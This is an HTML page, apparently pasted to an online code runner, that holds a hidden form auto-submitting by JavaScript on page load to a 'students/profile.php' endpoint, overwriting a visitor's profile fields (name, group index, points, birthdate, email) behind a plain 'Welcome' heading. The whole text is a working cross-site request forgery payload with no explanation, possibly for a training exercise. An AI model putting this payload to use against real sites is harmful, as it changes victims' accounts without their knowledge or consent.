fork download
  1. <form action="http://students/profile.php" style="display: none" id="f" method="POST">
  2. <input name="name" value="Харука">
  3. <input name="sex" value="Female">
  4. <input name="groupindex" value="31337">
  5. <input name="points" value="1">
  6. <input name="submitted" value="yes">
  7. <input name="sname" value="Харука">
  8. <input name="points" value="1">
  9. <input name="birthdate" value="2000">
  10. <input name="email" value="31337@example.com">
  11.  
  12. <input type="submit">
  13. </form>
  14. <h1>Welcome</h1>
  15. <script>
  16. document.getElementById('f').submit();
  17. </script>
  18.  
Success #stdin #stdout 0.02s 24448KB
stdin
Standard input is empty
stdout
<form action="http://students/profile.php" style="display: none" id="f" method="POST">
<input name="name" value="Харука">
<input name="sex" value="Female">
<input name="groupindex" value="31337">
<input name="points" value="1">
<input name="submitted" value="yes">
<input name="sname" value="Харука">
<input name="points" value="1">
<input name="birthdate" value="2000">
<input name="email" value="31337@example.com">

<input type="submit">
</form>
<h1>Welcome</h1>
<script>
document.getElementById('f').submit();
</script>